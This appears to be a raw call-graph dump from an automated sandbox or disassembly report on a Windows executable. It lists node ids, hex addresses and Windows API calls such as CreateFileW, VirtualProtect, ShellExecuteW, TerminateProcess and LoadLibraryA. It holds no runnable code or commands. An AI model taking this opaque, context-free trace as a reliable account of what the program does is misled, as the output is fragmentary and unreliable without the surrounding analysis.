95771->95773 95774 7d7510 53 API calls 95772->95774 95775 8475a3 95773->95775 95776 8474aa 95774->95776 95777 7da961 22 API calls 95775->95777 95881 7d525f 22 API calls 95776->95881 95779 8475ab 95777->95779 95781 7d6246 CloseHandle 95779->95781 95780 8474bf 95882 7d6350 95780->95882 95783 8475b2 95781->95783 95849 7d7510 95783->95849 95786 84754a 95893 7db567 39 API calls 95786->95893 95789 7d6246 CloseHandle 95792 8475c8 95789->95792 95791 847502 95791->95786 95793 847506 95791->95793 95872 7d5745 95792->95872 95795 7d9cb3 22 API calls 95793->95795 95797 847513 95795->95797 95892 83d2c1 26 API calls 95797->95892 95798 8476de GetLastError 95801 8476f7 95798->95801 95799 8475ea 95894 7d53de 27 API calls ISource 95799->95894 95901 7d6216 CloseHandle ISource 95801->95901 95804 84751c 95804->95786 95805 8475f8 95895 7d53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95805->95895 95807 847645 95808 7efddb 22 API calls 95807->95808 95810 847679 95808->95810 95809 8475ff 95809->95807 95896 83ccff 95809->95896 95812 7da961 22 API calls 95810->95812 95813 847686 95812->95813 95813->95814 95900 83417d 22 API calls __fread_nolock 95813->95900 95814->95558 95925 857f59 95816->95925 95818 85959b 95818->95558 95820 7d625f 95819->95820 95821 7d6250 95819->95821 95820->95821 95822 7d6264 CloseHandle 95820->95822 95821->95558 95822->95821 96028 8498e3 95823->96028 95825 8483ea 95825->95558 95826->95560 95827->95519 95829 7d9cc2 _wcslen 95828->95829 95830 7efe0b 22 API calls 95829->95830 95831 7d9cea __fread_nolock 95830->95831 95832 7efddb 22 API calls 95831->95832 95833 7d9d00 95832->95833 95833->95529 95834->95525 95835->95532 95836->95544 95837->95544 95838->95521 95839->95555 95840->95555 95841->95555 95842->95553 95843->95558 95844->95555 95845->95754 95846->95756 95847->95755 95848->95759 95850 7d7525 95849->95850 95866 7d7522 95849->95866 95851 7d752d 95850->95851 95852 7d755b 95850->95852 95902 7f51c6 26 API calls 95851->95902 95854 8150f6 95852->95854 95857 7d756d 95852->95857 95858 81500f 95852->95858 95905 7f5183 26 API calls 95854->95905 95855 7d753d 95862 7efddb 22 API calls 95855->95862 95903 7efb21 51 API calls 95857->95903 95865 7efe0b 22 API calls 95858->95865 95871 815088 95858->95871 95859 81510e 95859->95859 95863 7d7547 95862->95863 95864 7d9cb3 22 API calls 95863->95864 95864->95866 95867 815058 95865->95867 95866->95789 95868 7efddb 22 API calls 95867->95868 95869 81507f 95868->95869 95870 7d9cb3 22 API calls 95869->95870 95870->95871 95904 7efb21 51 API calls 95871->95904 95873 7d575c CreateFileW 95872->95873 95874 814035 95872->95874 95875 7d577b 95873->95875 95874->95875 95876 81403b CreateFileW 95874->95876 95875->95798 95875->95799 95876->95875 95877 814063 95876->95877 95906 7d54c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95877->95906 95879 81406e 95879->95875 95880->95762 95881->95780 95883 814a51 95882->95883 95884 7d6362 95882->95884 95917 7d4a88 22 API calls __fread_nolock 95883->95917 95907 7d6373 95884->95907 95887 814a5b 95889 814a67 95887->95889 95918 7da8c7 22 API calls __fread_nolock 95887->95918 95888 7d636e 95888->95786 95891 83d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 95888->95891 95891->95791 95892->95804 95893->95764 95894->95805 95895->95809 95897 83cd19 WriteFile 95896->95897 95898 83cd0e 95896->95898 95897->95807 95924 83cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95898->95924 95900->95814 95901->95814 95902->95855 95903->95855 95904->95854 95905->95859 95906->95879 95909 7d6382 95907->95909 95913 7d63b6 __fread_nolock 95907->95913 95908 814a82 95911 7efddb 22 API calls 95908->95911 95909->95908 95910 7d63a9 95909->95910 95909->95913 95919 7da587 95910->95919 95914 814a91 95911->95914 95913->95888 95915 7efe0b 22 API calls 95914->95915 95916 814ac5 __fread_nolock 95915->95916 95917->95887 95918->95889 95920 7da598 __fread_nolock 95919->95920 95921 7da59d 95919->95921 95920->95913 95922 81f80f 95921->95922 95923 7efe0b 22 API calls 95921->95923 95923->95920 95924->95897 95926 7d7510 53 API calls 95925->95926 95927 857f90 95926->95927 95945 857fd5 ISource 95927->95945 95963 858cd3 95927->95963 95929 858281 95930 85844f 95929->95930 95934 85828f 95929->95934 96004 858ee4 60 API calls 95930->96004 95933 85845e 95933->95934 95935 85846a 95933->95935 95976 857e86 95934->95976 95935->95945 95936 7d7510 53 API calls 95942 858049 95936->95942 95941 8582c8 95991 7efc70 95941->95991 95942->95929 95942->95936 95942->95945 95995 83417d 22 API calls __fread_nolock 95942->95995 95996 85851d 42 API calls _strftime 95942->95996 95945->95818 95946 858302 95998 7d63eb 22 API calls 95946->95998 95947 8582e8 95997 84359c 82 API calls __wsopen_s 95947->95997 95950 8582f3 GetCurrentProcess TerminateProcess 95950->95946 95951 858311 95999 7d6a50 22 API calls 95951->95999 95953 85832a 95962 858352 95953->95962 96000 7e04f0 22 API calls 95953->96000 95955 8584c5 95955->95945 95957 8584d9 FreeLibrary 95955->95957 95956 858341 96001 858b7b 75 API calls 95956->96001 95957->95945 95962->95955 96002 7e04f0 22 API calls 95962->96002 96003 7daceb 23 API calls ISource 95962->96003 96005 858b7b 75 API calls 95962->96005 96006 7daec9 95963->96006 95965 858cee CharLowerBuffW 96012 838e54 95965->96012 95969 7da961 22 API calls 95970 858d2a 95969->95970 96019 7d6d25 22 API calls __fread_nolock 95970->96019 95972 858d3e 96020 7d93b2 95972->96020 95974 858e5e _wcslen 95974->95942 95975 858d48 _wcslen 95975->95974 96024 85851d 42 API calls _strftime 95975->96024 95977 857ea1 95976->95977 95981 857eec 95976->95981 95978 7efe0b 22 API calls 95977->95978 95980 857ec3 95978->95980 95979 7efddb 22 API calls 95979->95980 95980->95979 95980->95981 95982 859096 95981->95982 95983 8592ab ISource 95982->95983 95990 8590ba _strcat _wcslen 95982->95990 95983->95941 95984 7db38f 39 API calls 95984->95990 95985 7db567 39 API calls 95985->95990 95986 7db6b5 39 API calls 95986->95990 95987 7fea0c 21 API calls ___std_exception_copy 95987->95990 95988 7d7510 53 API calls 95988->95990 95990->95983 95990->95984 95990->95985 95990->95986 95990->95987 95990->95988 96027 83efae 24 API calls _wcslen 95990->96027 95992 7efc85 95991->95992 95993 7efd1d VirtualProtect 95992->95993 95994 7efceb 95992->95994 95993->95994 95994->95946 95994->95947 95995->95942 95996->95942 95997->95950 95998->95951 95999->95953 96000->95956 96001->95962 96002->95962 96003->95962 96004->95933 96005->95962 96007 7daedc 96006->96007 96008 7daed9 __fread_nolock 96006->96008 96009 7efddb 22 API calls 96007->96009 96008->95965 96010 7daee7 96009->96010 96011 7efe0b 22 API calls 96010->96011 96011->96008 96014 838e74 _wcslen 96012->96014 96013 838f63 96013->95969 96013->95975 96014->96013 96015 838ea9 96014->96015 96016 838f68 96014->96016 96015->96013 96025 7ece60 41 API calls 96015->96025 96016->96013 96026 7ece60 41 API calls 96016->96026 96019->95972 96021 7d93c0 96020->96021 96023 7d93c9 __fread_nolock 96020->96023 96022 7daec9 22 API calls 96021->96022 96021->96023 96022->96023 96023->95975 96024->95974 96025->96015 96026->96016 96027->95990 96029 849902 96028->96029 96030 8499e8 96028->96030 96032 7efddb 22 API calls 96029->96032 96086 849caa 39 API calls 96030->96086 96033 849909 96032->96033 96034 7efe0b 22 API calls 96033->96034 96035 84991a 96034->96035 96036 7d6246 CloseHandle 96035->96036 96038 849925 96036->96038 96037 849ac5 96079 841e96 96037->96079 96041 7da961 22 API calls 96038->96041 96039 8499ca 96039->95825 96044 84992d 96041->96044 96042 849acc 96049 83ccff 4 API calls 96042->96049 96043 8499a2 96043->96037 96043->96039 96045 849a33 96043->96045 96046 7d6246 CloseHandle 96044->96046 96047 7d7510 53 API calls 96045->96047 96048 849934 96046->96048 96055 849a3a 96047->96055 96050 7d7510 53 API calls 96048->96050 96073 849aa8 96049->96073 96054 849940 96050->96054 96051 849abb 96099 83cd57 30 API calls 96051->96099 96052 849a6e 96087 7d6270 22 API calls 96052->96087 96057 7d6246 CloseHandle 96054->96057 96055->96051 96055->96052 96060 84994a 96057->96060 96058 7d6246 CloseHandle 96061 849b1e 96058->96061 96059 849a7e 96062 849a8e 96059->96062 96088 7da8c7 22 API calls __fread_nolock 96059->96088 96063 7d5745 5 API calls 96060->96063 96100 7d6216 CloseHandle ISource 96061->96100 96089 7d33c6 96062->96089 96066 849959 96063->96066 96068 8499c2 96066->96068 96069 84995d 96066->96069 96085 7d6216 CloseHandle ISource 96068->96085 96083 7d53de 27 API calls ISource 96069->96083 96073->96039 96073->96058 96075 84996b 96084 7d53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96075->96084 96077 849972 96077->96043 96078 83ccff 4 API calls 96077->96078 96078->96043 96080 841e9f 96079->96080 96082 841ea4 96079->96082 96101 840f67 24 API calls __fread_nolock 96080->96101 96082->96042 96083->96075 96084->96077 96085->96039 96086->96043 96087->96059 96088->96062 96090 7d33dd 96089->96090 96091 8130bb 96089->96091 96102 7d33ee 96090->96102 96093 7efddb 22 API calls 96091->96093 96095 8130c5 _wcslen 96093->96095 96094 7d33e8 96098 83cd57 30 API calls 96094->96098 96096 7efe0b 22 API calls 96095->96096 96097 8130fe __fread_nolock 96096->96097 96098->96073 96099->96073 96100->96039 96101->96082 96103 7d33fe _wcslen 96102->96103 96104 81311d 96103->96104 96105 7d3411 96103->96105 96107 7efddb 22 API calls 96104->96107 96106 7da587 22 API calls 96105->96106 96108 7d341e __fread_nolock 96106->96108 96109 813127 96107->96109 96108->96094 96110 7efe0b 22 API calls 96109->96110 96111 813157 __fread_nolock 96110->96111 96113 7dae01 96112->96113 96116 7dae1c ISource 96112->96116 96114 7daec9 22 API calls 96113->96114 96115 7dae09 CharUpperBuffW 96114->96115 96115->96116 96116->95573 96118 7dacae 96117->96118 96119 7dacd1 96118->96119 96148 84359c 82 API calls __wsopen_s 96118->96148 96119->95597 96122 81fadb 96121->96122 96123 7dad92 96121->96123 96124 7efddb 22 API calls 96123->96124 96125 7dad99 96124->96125 96149 7dadcd 96125->96149 96128->95624 96129->95600 96130->95600 96131->95578 96132->95610 96133->95591 96134->95610 96135->95610 96136->95597 96137->95597 96138->95597 96139->95597 96140->95597 96141->95597 96142->95606 96143->95610 96144->95615 96145->95614 96146->95623 96147->95610 96148->96119 96153 7daddd 96149->96153 96150 7dadb6 96150->95597 96151 7efddb 22 API calls 96151->96153 96152 7da961 22 API calls 96152->96153 96153->96150 96153->96151 96153->96152 96155 7dadcd 22 API calls 96153->96155 96156 7da8c7 22 API calls __fread_nolock 96153->96156 96155->96153 96156->96153 96157->95636 96158->95636 96159->95647 96160->95647 96161->95647 96162->95647 96163->95635 96164->95647 96165 808402 96170 8081be 96165->96170 96168 80842a 96175 8081ef try_get_first_available_module 96170->96175 96172 8083ee 96189 8027ec 26 API calls __wsopen_s 96172->96189 96174 808343 96174->96168 96182 810984 96174->96182 96178 808338 96175->96178 96185 7f8e0b 40 API calls 2 library calls 96175->96185 96177 80838c 96177->96178 96186 7f8e0b 40 API calls 2 library calls 96177->96186 96178->96174 96188 7ff2d9 20 API calls __dosmaperr 96178->96188 96180 8083ab 96180->96178 96187 7f8e0b 40 API calls 2 library calls 96180->96187 96190 810081 96182->96190 96184 81099f 96184->96168 96185->96177 96186->96180 96187->96178 96188->96172 96189->96174 96193 81008d BuildCatchObjectHelperInternal 96190->96193 96191 81009b 96247 7ff2d9 20 API calls __dosmaperr 96191->96247 96193->96191 96195 8100d4 96193->96195 96194 8100a0 96248 8027ec 26 API calls __wsopen_s 96194->96248 96201 81065b 96195->96201 96199 8100aa __wsopen_s 96199->96184 96202 810678 96201->96202 96203 8106a6 96202->96203 96204 81068d 96202->96204 96250 805221 96203->96250 96264 7ff2c6 20 API calls __dosmaperr 96204->96264 96207 8106ab 96209 8106b4 96207->96209 96210 8106cb 96207->96210 96208 810692 96265 7ff2d9 20 API calls __dosmaperr 96208->96265 96266 7ff2c6 20 API calls __dosmaperr 96209->96266 96263 81039a CreateFileW 96210->96263 96214 8106b9 96267 7ff2d9 20 API calls __dosmaperr 96214->96267 96216 810781 GetFileType 96217 8107d3 96216->96217 96218 81078c GetLastError 96216->96218 96272 80516a 21 API calls 2 library calls 96217->96272 96270 7ff2a3 20 API calls __dosmaperr 96218->96270 96219 810756 GetLastError 96269 7ff2a3 20 API calls __dosmaperr 96219->96269 96220 810704 96220->96216 96220->96219 96268 81039a CreateFileW 96220->96268 96224 81079a CloseHandle 96224->96208 96227 8107c3 96224->96227 96226 810749 96226->96216 96226->96219 96271 7ff2d9 20 API calls __dosmaperr 96227->96271 96228 8107f4 96233 810840 96228->96233 96273 8105ab 72 API calls 3 library calls 96228->96273 96230 8107c8 96230->96208 96235 81086d 96233->96235 96274 81014d 72 API calls 4 library calls 96233->96274 96234 810866 96234->96235 96236 81087e 96234->96236 96275 8086ae 96235->96275 96238 8100f8 96236->96238 96239 8108fc CloseHandle 96236->96239 96249 810121 LeaveCriticalSection __wsopen_s 96238->96249 96290 81039a CreateFileW 96239->96290 96241 810927 96242 810931 GetLastError 96241->96242 96243 81095d 96241->96243 96291 7ff2a3 20 API calls __dosmaperr 96242->96291 96243->96238 96245 81093d 96292 805333 21 API calls 2 library calls 96245->96292 96247->96194 96248->96199 96249->96199 96251 80522d BuildCatchObjectHelperInternal 96250->96251 96293 802f5e EnterCriticalSection 96251->96293 96253 80527b 96294 80532a 96253->96294 96254 805259 96297 805000 96254->96297 96255 805234 96255->96253 96255->96254 96260 8052c7 EnterCriticalSection 96255->96260 96258 8052a4 __wsopen_s 96258->96207 96260->96253 96261 8052d4 LeaveCriticalSection 96260->96261 96261->96255 96263->96220 96264->96208 96265->96238 96266->96214 96267->96208 96268->96226 96269->96208 96270->96224 96271->96230 96272->96228 96273->96233 96274->96234 96323 8053c4 96275->96323 96277 8086c4 96336 805333 21 API calls 2 library calls 96277->96336 96279 8086be 96279->96277 96282 8053c4 __wsopen_s 26 API calls 96279->96282 96288 8086f6 96279->96288 96280 8053c4 __wsopen_s 26 API calls 96283 808702 CloseHandle 96280->96283 96281 80871c 96289 80873e 96281->96289 96337 7ff2a3 20 API calls __dosmaperr 96281->96337 96284 8086ed 96282->96284 96283->96277 96285 80870e GetLastError 96283->96285 96287 8053c4 __wsopen_s 26 API calls 96284->96287 96285->96277 96287->96288 96288->96277 96288->96280 96289->96238 96290->96241 96291->96245 96292->96243 96293->96255 96305 802fa6 LeaveCriticalSection 96294->96305 96296 805331 96296->96258 96306 804c7d 96297->96306 96299 80501f 96314 8029c8 96299->96314 96301 805012 96301->96299 96313 803405 11 API calls 2 library calls 96301->96313 96302 805071 96302->96253 96304 805147 EnterCriticalSection 96302->96304 96304->96253 96305->96296 96312 804c8a __dosmaperr 96306->96312 96307 804cca 96321 7ff2d9 20 API calls __dosmaperr 96307->96321 96308 804cb5 RtlAllocateHeap 96310 804cc8 96308->96310 96308->96312 96310->96301 96312->96307 96312->96308 96320 7f4ead 7 API calls 2 library calls 96312->96320 96313->96301 96315 8029fc __dosmaperr 96314->96315 96316 8029d3 RtlFreeHeap 96314->96316 96315->96302 96316->96315 96317 8029e8 96316->96317 96322 7ff2d9 20 API calls __dosmaperr 96317->96322 96319 8029ee GetLastError 96319->96315 96320->96312 96321->96310 96322->96319 96324 8053d1 96323->96324 96326 8053e6 96323->96326 96338 7ff2c6 20 API calls __dosmaperr 96324->96338 96331 80540b 96326->96331 96340 7ff2c6 20 API calls __dosmaperr 96326->96340 96327 8053d6 96339 7ff2d9 20 API calls __dosmaperr 96327->96339 96329 805416 96341 7ff2d9 20 API calls __dosmaperr 96329->96341 96331->96279 96333 8053de 96333->96279 96334 80541e 96342 8027ec 26 API calls __wsopen_s 96334->96342 96336->96281 96337->96289 96338->96327 96339->96333 96340->96329 96341->96334 96342->96333 96343 7df7bf 96344 7dfcb6 96343->96344 96345 7df7d3 96343->96345 96380 7daceb 23 API calls ISource 96344->96380 96347 7dfcc2 96345->96347 96348 7efddb 22 API calls 96345->96348 96381 7daceb 23 API calls ISource 96347->96381 96350 7df7e5 96348->96350 96350->96347 96351 7df83e 96350->96351 96352 7dfd3d 96350->96352 96354 7e1310 207 API calls 96351->96354 96367 7ded9d ISource 96351->96367 96382 841155 22 API calls 96352->96382 96375 7dec76 ISource 96354->96375 96355 7dfef7 96355->96367 96384 7da8c7 22 API calls __fread_nolock 96355->96384 96358 824b0b 96386 84359c 82 API calls __wsopen_s 96358->96386 96359 7da8c7 22 API calls 96359->96375 96360 824600 96360->96367 96383 7da8c7 22 API calls __fread_nolock 96360->96383 96366 7dfbe3 96366->96367 96369 824bdc 96366->96369 96376 7df3ae ISource 96366->96376 96368 7da961 22 API calls 96368->96375 96387 84359c 82 API calls __wsopen_s 96369->96387 96371 7f00a3 29 API calls pre_c_initialization 96371->96375 96372 7f0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96372->96375 96373 824beb 96388 84359c 82 API calls __wsopen_s 96373->96388 96374 7efddb 22 API calls 96374->96375 96375->96355 96375->96358 96375->96359 96375->96360 96375->96366 96375->96367 96375->96368 96375->96371 96375->96372 96375->96373 96375->96374 96375->96376 96377 7f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96375->96377 96378 7e01e0 207 API calls 2 library calls 96375->96378 96379 7e06a0 41 API calls ISource 96375->96379 96376->96367 96385 84359c 82 API calls __wsopen_s 96376->96385 96377->96375 96378->96375 96379->96375 96380->96347 96381->96352 96382->96367 96383->96367 96384->96367 96385->96367 96386->96367 96387->96373 96388->96367 96389 823a41 96393 8410c0 96389->96393 96391 823a4c 96392 8410c0 53 API calls 96391->96392 96392->96391 96394 8410fa 96393->96394 96399 8410cd 96393->96399 96394->96391 96395 8410fc 96405 7efa11 53 API calls 96395->96405 96397 841101 96398 7d7510 53 API calls 96397->96398 96400 841108 96398->96400 96399->96394 96399->96395 96399->96397 96402 8410f4 96399->96402 96401 7d6350 22 API calls 96400->96401 96401->96394 96404 7db270 39 API calls 96402->96404 96404->96394 96405->96397 96406 812ba5 96407 7d2b25 96406->96407 96408 812baf 96406->96408 96434 7d2b83 7 API calls 96407->96434 96440 7d3a5a 96408->96440 96411 812bb8 96414 7d9cb3 22 API calls 96411->96414 96416 812bc6 96414->96416 96415 7d2b2f 96424 7d2b44 96415->96424 96438 7d3837 49 API calls ___scrt_fastfail 96415->96438 96417 812bf5 96416->96417 96418 812bce 96416->96418 96421 7d33c6 22 API calls 96417->96421 96420 7d33c6 22 API calls 96418->96420 96422 812bd9 96420->96422 96432 812bf1 GetForegroundWindow ShellExecuteW 96421->96432 96425 7d6350 22 API calls 96422->96425 96423 7d2b5f 96431 7d2b66 SetCurrentDirectoryW 96423->96431 96424->96423 96439 7d30f2 Shell_NotifyIconW ___scrt_fastfail 96424->96439 96428 812be7 96425->96428 96430 7d33c6 22 API calls 96428->96430 96429 812c26 96429->96423 96430->96432 96433 7d2b7a 96431->96433 96432->96429 96447 7d2cd4 7 API calls 96434->96447 96436 7d2b2a 96437 7d2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96436->96437 96437->96415 96438->96424 96439->96423 96448 811f50 96440->96448 96443 7d9cb3 22 API calls 96444 7d3a8d 96443->96444 96450 7d3aa2 96444->96450 96446 7d3a97 96446->96411 96447->96436 96449 7d3a67 GetModuleFileNameW 96448->96449 96449->96443 96451 811f50 __wsopen_s 96450->96451 96452 7d3aaf GetFullPathNameW 96451->96452 96453 7d3ace 96452->96453 96454 7d3ae9 96452->96454 96464 7d6b57 96453->96464 96476 7da6c3 96454->96476 96457 7d3ada 96460 7d37a0 96457->96460 96461 7d37ae 96460->96461 96462 7d93b2 22 API calls 96461->96462 96463 7d37c2 96462->96463 96463->96446 96465 814ba1 96464->96465 96466 7d6b67 _wcslen 96464->96466 96467 7d93b2 22 API calls 96465->96467 96469 7d6b7d 96466->96469 96470 7d6ba2 96466->96470 96468 814baa 96467->96468 96468->96468 96482 7d6f34 22 API calls 96469->96482 96472 7efddb 22 API calls 96470->96472 96473 7d6bae 96472->96473 96475 7efe0b 22 API calls 96473->96475 96474 7d6b85 __fread_nolock 96474->96457 96475->96474 96477 7da6dd 96476->96477 96478 7da6d0 96476->96478 96479 7efddb 22 API calls 96477->96479 96478->96457 96480 7da6e7 96479->96480 96481 7efe0b 22 API calls 96480->96481 96481->96478 96482->96474 96483 7f03fb 96484 7f0407 BuildCatchObjectHelperInternal 96483->96484 96512 7efeb1 96484->96512 96486 7f040e 96487 7f0561 96486->96487 96490 7f0438 96486->96490 96539 7f083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96487->96539 96489 7f0568 96540 7f4e52 28 API calls _abort 96489->96540 96497 7f0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96490->96497 96523 80247d 96490->96523 96492 7f056e 96541 7f4e04 28 API calls _abort 96492->96541 96496 7f0576 96500 7f04d8 96497->96500 96535 7f4e1a 38 API calls 2 library calls 96497->96535 96498 7f0457 96531 7f0959 96500->96531 96503 7f04de 96504 7f04f3 96503->96504 96536 7f0992 GetModuleHandleW 96504->96536 96506 7f04fa 96506->96489 96507 7f04fe 96506->96507 96508 7f0507 96507->96508 96537 7f4df5 28 API calls _abort 96507->96537 96538 7f0040 13 API calls 2 library calls 96508->96538 96511 7f050f 96511->96498 96513 7efeba 96512->96513 96542 7f0698 IsProcessorFeaturePresent 96513->96542 96515 7efec6 96543 7f2c94 10 API calls 3 library calls 96515->96543 96517 7efecb 96522 7efecf 96517->96522 96544 802317 96517->96544 96520 7efee6 96520->96486 96522->96486 96526 802494 96523->96526 96524 7f0a8c _ValidateLocalCookies 5 API calls 96525 7f0451 96524->96525 96525->96498 96527 802421 96525->96527 96526->96524 96528 802450 96527->96528 96529 7f0a8c _ValidateLocalCookies 5 API calls 96528->96529 96530 802479 96529->96530 96530->96497 96595 7f2340 96531->96595 96534 7f097f 96534->96503 96535->96500 96536->96506 96537->96508 96538->96511 96539->96489 96540->96492 96541->96496 96542->96515 96543->96517 96548 80d1f6 96544->96548 96547 7f2cbd 8 API calls 3 library calls 96547->96522 96549 80d213 96548->96549 96552 80d20f 96548->96552 96549->96552 96554 804bfb 96549->96554 96551 7efed8 96551->96520 96551->96547 96566 7f0a8c 96552->96566 96555 804c07 BuildCatchObjectHelperInternal 96554->96555 96573 802f5e EnterCriticalSection 96555->96573 96557 804c0e 96574 8050af 96557->96574 96559 804c1d 96560 804c2c 96559->96560 96587 804a8f 29 API calls 96559->96587 96589 804c48 LeaveCriticalSection _abort 96560->96589 96563 804c3d __wsopen_s 96563->96549 96564 804c27 96588 804b45 GetStdHandle GetFileType 96564->96588 96567 7f0a97 IsProcessorFeaturePresent 96566->96567 96568 7f0a95 96566->96568 96570 7f0c5d 96567->96570 96568->96551 96594 7f0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96570->96594 96572 7f0d40 96572->96551 96573->96557 96575 8050bb BuildCatchObjectHelperInternal 96574->96575 96576 8050c8 96575->96576 96577 8050df 96575->96577 96591 7ff2d9 20 API calls __dosmaperr 96576->96591 96590 802f5e EnterCriticalSection 96577->96590 96580 8050cd 96592 8027ec 26 API calls __wsopen_s 96580->96592 96582 8050d7 __wsopen_s 96582->96559 96583 805117 96593 80513e LeaveCriticalSection _abort 96583->96593 96585 8050eb 96585->96583 96586 805000 __wsopen_s 21 API calls 96585->96586 96586->96585 96587->96564 96588->96560 96589->96563 96590->96585 96591->96580 96592->96582 96593->96582 96594->96572 96596 7f096c GetStartupInfoW 96595->96596 96596->96534 96597 7d1098 96602 7d42de 96597->96602 96601 7d10a7 96603 7da961 22 API calls 96602->96603 96604 7d42f5 GetVersionExW 96603->96604 96605 7d6b57 22 API calls 96604->96605 96606 7d4342 96605->96606 96607 7d93b2 22 API calls 96606->96607 96609 7d4378 96606->96609 96608 7d436c 96607->96608 96611 7d37a0 22 API calls 96608->96611 96610 7d441b GetCurrentProcess IsWow64Process 96609->96610 96613 8137df 96609->96613 96612 7d4437 96610->96612 96611->96609 96614 7d444f LoadLibraryA 96612->96614 96615 813824 GetSystemInfo 96612->96615 96616 7d449c GetSystemInfo 96614->96616 96617 7d4460 GetProcAddress 96614->96617 96618 7d4476 96616->96618 96617->96616 96619 7d4470 GetNativeSystemInfo 96617->96619 96620 7d447a FreeLibrary 96618->96620 96621 7d109d 96618->96621 96619->96618 96620->96621 96622 7f00a3 29 API calls __onexit 96621->96622 96622->96601 96623 7d105b 96628 7d344d 96623->96628 96625 7d106a 96659 7f00a3 29 API calls __onexit 96625->96659 96627 7d1074 96629 7d345d __wsopen_s 96628->96629 96630 7da961 22 API calls 96629->96630 96631 7d3513 96630->96631 96632 7d3a5a 24 API calls 96631->96632 96633 7d351c 96632->96633 96660 7d3357 96633->96660 96636 7d33c6 22 API calls 96637 7d3535 96636->96637 96666 7d515f 96637->96666 96640 7da961 22 API calls 96641 7d354d 96640->96641 96642 7da6c3 22 API calls 96641->96642 96643 7d3556 RegOpenKeyExW 96642->96643 96644 7d3578 96643->96644 96645 813176 RegQueryValueExW 96643->96645 96644->96625 96646 813193 96645->96646 96647 81320c RegCloseKey 96645->96647 96648 7efe0b 22 API calls 96646->96648 96647->96644 96658 81321e _wcslen 96647->96658 96649 8131ac 96648->96649 96672 7d5722 96649->96672 96650 7d4c6d 22 API calls 96650->96658 96653 8131d4 96654 7d6b57 22 API calls 96653->96654 96655 8131ee ISource 96654->96655 96655->96647 96656 7d9cb3 22 API calls 96656->96658 96657 7d515f 22 API calls 96657->96658 96658->96644 96658->96650 96658->96656 96658->96657 96659->96627 96661 811f50 __wsopen_s 96660->96661 96662 7d3364 GetFullPathNameW 96661->96662 96663 7d3386 96662->96663 96664 7d6b57 22 API calls 96663->96664 96665 7d33a4 96664->96665 96665->96636 96667 7d516e 96666->96667 96668 7d518f __fread_nolock 96666->96668 96670 7efe0b 22 API calls 96667->96670 96669 7efddb 22 API calls 96668->96669 96671 7d3544 96669->96671 96670->96668 96671->96640 96673 7efddb 22 API calls 96672->96673 96674 7d5734 RegQueryValueExW 96673->96674 96674->96653 96674->96655 96675 7d2e37 96676 7da961 22 API calls 96675->96676 96677 7d2e4d 96676->96677 96754 7d4ae3 96677->96754 96679 7d2e6b 96680 7d3a5a 24 API calls 96679->96680 96681 7d2e7f 96680->96681 96682 7d9cb3 22 API calls 96681->96682 96683 7d2e8c 96682->96683 96768 7d4ecb 96683->96768 96686 7d2ead 96790 7da8c7 22 API calls __fread_nolock 96686->96790 96687 812cb0 96808 842cf9 96687->96808 96689 812cc3 96690 812ccf 96689->96690 96834 7d4f39 96689->96834 96695 7d4f39 68 API calls 96690->96695 96693 7d2ec3 96791 7d6f88 22 API calls 96693->96791 96698 812ce5 96695->96698 96696 7d2ecf 96697 7d9cb3 22 API calls 96696->96697 96699 7d2edc 96697->96699 96840 7d3084 22 API calls 96698->96840 96792 7da81b 41 API calls 96699->96792 96701 7d2eec 96704 7d9cb3 22 API calls 96701->96704 96703 812d02 96841 7d3084 22 API calls 96703->96841 96706 7d2f12 96704->96706 96793 7da81b 41 API calls 96706->96793 96707 812d1e 96709 7d3a5a 24 API calls 96707->96709 96710 812d44 96709->96710 96842 7d3084 22 API calls 96710->96842 96711 7d2f21 96714 7da961 22 API calls 96711->96714 96713 812d50 96843 7da8c7 22 API calls __fread_nolock 96713->96843 96716 7d2f3f 96714->96716 96794 7d3084 22 API calls 96716->96794 96718 812d5e 96844 7d3084 22 API calls 96718->96844 96719 7d2f4b 96795 7f4a28 40 API calls 3 library calls 96719->96795 96722 812d6d 96845 7da8c7 22 API calls __fread_nolock 96722->96845 96723 7d2f59 96723->96698 96724 7d2f63 96723->96724 96796 7f4a28 40 API calls 3 library calls 96724->96796 96727 812d83 96846 7d3084 22 API calls 96727->96846 96728 7d2f6e 96728->96703 96730 7d2f78 96728->96730 96797 7f4a28 40 API calls 3 library calls 96730->96797 96731 812d90 96733 7d2f83 96733->96707 96734 7d2f8d 96733->96734 96798 7f4a28 40 API calls 3 library calls 96734->96798 96736 7d2f98 96737 7d2fdc 96736->96737 96799 7d3084 22 API calls 96736->96799 96737->96722 96738 7d2fe8 96737->96738 96738->96731 96802 7d63eb 22 API calls 96738->96802 96740 7d2fbf 96800 7da8c7 22 API calls __fread_nolock 96740->96800 96743 7d2ff8 96803 7d6a50 22 API calls 96743->96803 96744 7d2fcd 96801 7d3084 22 API calls 96744->96801 96747 7d3006 96804 7d70b0 23 API calls 96747->96804 96751 7d3021 96752 7d3065 96751->96752 96805 7d6f88 22 API calls 96751->96805 96806 7d70b0 23 API calls 96751->96806 96807 7d3084 22 API calls 96751->96807 96755 7d4af0 __wsopen_s 96754->96755 96756 7d6b57 22 API calls 96755->96756 96757 7d4b22 96755->96757 96756->96757 96764 7d4b58 96757->96764 96847 7d4c6d 96757->96847 96759 7d4c6d 22 API calls 96759->96764 96760 7d9cb3 22 API calls 96762 7d4c52 96760->96762 96761 7d9cb3 22 API calls 96761->96764 96763 7d515f 22 API calls 96762->96763 96766 7d4c5e 96763->96766 96764->96759 96764->96761 96765 7d515f 22 API calls 96764->96765 96767 7d4c29 96764->96767 96765->96764 96766->96679 96767->96760 96767->96766 96850 7d4e90 LoadLibraryA 96768->96850 96773 7d4ef6 LoadLibraryExW 96858 7d4e59 LoadLibraryA 96773->96858 96774 813ccf 96775 7d4f39 68 API calls 96774->96775 96778 813cd6 96775->96778 96780 7d4e59 3 API calls 96778->96780 96782 813cde 96780->96782 96781 7d4f20 96781->96782 96783 7d4f2c 